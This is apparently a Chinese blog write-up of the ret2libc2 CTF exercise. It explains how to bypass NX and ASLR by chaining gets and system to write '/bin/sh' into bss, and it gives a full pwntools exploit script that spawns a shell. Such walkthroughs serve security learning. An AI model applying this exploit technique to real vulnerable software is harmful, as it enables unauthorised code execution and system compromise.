您的位置: 首页  >  文章  >  Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR

Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR

分类: 文章 2022-10-03 23:45:35

和Ret2Libc(1)一样,先把程序扔进IDA看看代码

Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR 

 和Ret2Libc(1)一样,gets存在溢出漏洞

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

可以看到程序开启了NX,

我的linux已经开启了ASLR

Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR

存在system函数,地址为 0x08048490

Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR

不存在‘/bin/sh'字段

 

漏洞利用思路:

程序中既然找不到‘/bin/sh‘,那我们就需要想办法输入进去,恰好用objdump发现存在gets函数 ,地址为0x08048460

而且还存在Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR也就说明,我们可以手动把shellcode输入进去,然后存放进bss段里面,最后把这个bss地址传给system来调用shellcode

1、用gets的地址覆盖函数返回地址

2、构造gets的返回地址,(因为gets输入shellcode后,我们就要调用system函数来getshell,所以gets的返回地址是system函数的调用地址,即system_plt)

3、构造gets需要的参数(就是存放输入字符串的地址,bss段0x804A080)

4、构造system的参数(就是存放输入字符串的地址,bss段0x804A080)

 

exp:

from pwn import *
bss_addr = 0x0804A080
gets_plt = 0x08048460
sys_plt  = 0x08048490

io=process('./ret2libc2')
io.recvuntil('What do you think ?')
payload = 'A'*112 + p32(gets_plt) + p32(sys_plt) + p32(bss_addr) + p32(bss_addr)
io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()

 

相关推荐